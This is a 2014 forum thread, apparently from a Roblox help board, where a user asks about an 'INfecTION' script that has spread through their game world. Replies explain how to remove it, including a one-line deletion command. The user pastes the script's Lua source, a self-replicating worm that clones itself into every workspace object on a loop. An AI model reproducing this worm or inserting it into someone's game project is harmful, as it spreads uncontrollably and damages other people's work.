|
| 25 Jun 2014 11:13 PM |
I was building in my world when I noticed this in the scripting. Is it harmful, and how can I get rid of it?
|
|
|
| Report Abuse |
|
|
|
| 25 Jun 2014 11:14 PM |
| It's harmful and to get rid of it just delete it.. |
|
|
| Report Abuse |
|
|
262187
|
  |
| Joined: 07 Apr 2011 |
| Total Posts: 2966 |
|
|
| 25 Jun 2014 11:17 PM |
| Show me the section on the script that says InfecTion. |
|
|
| Report Abuse |
|
|
|
| 25 Jun 2014 11:17 PM |
| So do I go hand by hand deleting the script, its affected all my Parts and Models. |
|
|
| Report Abuse |
|
|
|
| 25 Jun 2014 11:20 PM |
@26, So its says:
InfecTION >Script.... or is it... if script.Parent.className ~= "RotateP" then local p = Instance.new("RotateP") p.Parent = workspace p.Name = "INfecTION" script.Parent = p end
function check() local list = workspace:GetChildren() for i = 1, #list do if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then script.Parent:Clone().Parent = list[i] end wait() end end
while true do check() if workspace:findFirstChild("inFECtion") == nil then local main = script.Parent:Clone() main.Name = "inFECtion" main.Parent = workspace end wait(3) end
|
|
|
| Report Abuse |
|
|
|
| 25 Jun 2014 11:26 PM |
| revert your place version, go in studio and delete it. |
|
|
| Report Abuse |
|
|
262187
|
  |
| Joined: 07 Apr 2011 |
| Total Posts: 2966 |
|
| |
|
|
| 25 Jun 2014 11:34 PM |
while workspace:findFirstChild("inFECtion", true) do wait() workspace:findFirstChild("inFECtion", true):Destroy() end
Studio command bar, don't click the run button, just press enter. |
|
|
| Report Abuse |
|
|